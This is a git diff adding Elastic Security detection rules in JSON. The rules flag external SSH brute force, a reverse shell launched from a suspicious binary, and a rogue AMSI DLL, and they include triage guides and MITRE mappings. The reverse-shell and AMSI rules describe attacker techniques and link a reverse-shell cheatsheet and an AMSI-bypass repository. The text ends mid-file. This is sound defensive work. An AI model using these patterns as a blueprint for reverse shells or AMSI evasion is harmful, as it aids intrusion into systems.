b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_6.json new file mode 100644 index 00000000000..ef174d60d09 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_6.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts.", + "from": "now-9m", + "index": [ + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 5, + "name": "Potential External Linux SSH Brute Force Detected", + "note": "## Triage and analysis\n\n### Investigating Potential External Linux SSH Brute Force Detected\n\nThe rule identifies consecutive SSH login failures targeting a user account from the same source IP address to the same target host indicating brute force login attempts.\n\nThis rule will generate a lot of noise for systems with a front-facing SSH service, as adversaries scan the internet for remotely accessible SSH services and try to brute force them to gain unauthorized access. \n\nIn case this rule generates too much noise and external brute forcing is of not much interest, consider turning this rule off and enabling \"Potential Internal Linux SSH Brute Force Detected\" to detect internal brute force attempts.\n\n#### Possible investigation steps\n\n- Investigate the login failure user name(s).\n- Investigate the source IP address of the failed ssh login attempt(s).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Infrastructure or availability issue.\n\n### Related Rules\n\n- Potential Internal Linux SSH Brute Force Detected - 1c27fa22-7727-4dd3-81c0-de6da5555feb\n- Potential SSH Password Guessing - 8cb84371-d053-4f4f-bce0-c74990e28f28\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, source.ip, user.name with maxspan=15s\n [ authentication where host.os.type == \"linux\" and \n event.action in (\"ssh_login\", \"user_login\") and event.outcome == \"failure\" and\n not cidrmatch(source.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \n \"::1\", \"FE80::/10\", \"FF00::/8\") ] with runs = 10\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fa210b61-b627-4e5e-86f4-17e8270656ab", + "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "fa210b61-b627-4e5e-86f4-17e8270656ab_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_7.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_7.json new file mode 100644 index 00000000000..5b3a580f93d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_7.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via Suspicious Binary", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.executable : (\n \"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/var/www/*\", \"/dev/shm/*\", \"/etc/init.d/*\", \"/etc/rc*.d/*\",\n \"/etc/crontab\", \"/etc/cron.*\", \"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\",\n \"/boot/*\", \"/srv/*\", \"/run/*\", \"/root/*\", \"/etc/rc.local\"\n ) and\n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and not\n process.name : (\"curl\", \"wget\", \"ping\", \"apt\", \"dpkg\", \"yum\", \"rpm\", \"dnf\", \"dockerd\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and\n process.executable : (\n \"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/var/www/*\", \"/dev/shm/*\", \"/etc/init.d/*\", \"/etc/rc*.d/*\",\n \"/etc/crontab\", \"/etc/cron.*\", \"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\",\n \"/boot/*\", \"/srv/*\", \"/run/*\", \"/root/*\", \"/etc/rc.local\"\n ) and destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fa3a59dc-33c3-43bf-80a9-e8437a922c7f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "fa3a59dc-33c3-43bf-80a9-e8437a922c7f_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_7.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_7.json new file mode 100644 index 00000000000..c04a164cb47 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_7.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of the Antimalware Scan Interface (AMSI) DLL in an unusual location. This may indicate an attempt to bypass AMSI by loading a rogue AMSI module instead of the legit one.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Antimalware Scan Interface DLL", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\servicing\\\\LCU\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n", + "references": [ + "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "fa488440-04cc-41d7-9279-539387bf2a17", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "fa488440-04cc-41d7-9279-539387bf2a17_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_8.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_8.json new file mode 100644 index 00000000000..8397cd0cb84 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_8.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of the Antimalware Scan Interface (AMSI) DLL in an unusual location. This may indicate an attempt to bypass AMSI by loading a rogue AMSI module instead of the legit one.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Antimalware Scan Interface DLL", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\servicing\\\\LCU\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n", + "references": [ + "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "fa488440-04cc-41d7-9279-539387bf2a17", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "fa488440-04cc-41d7-9279-539387bf2a17_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_9.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_9.json new file mode 100644 index 00000000000..a65365315b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_9.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of the Antimalware Scan Interface (AMSI) DLL in an unusual location. This may indicate an attempt to bypass AMSI by loading a rogue AMSI module instead of the legit one.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Antimalware Scan Interface DLL", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\servicing\\\\LCU\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n", + "references": [ + "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + 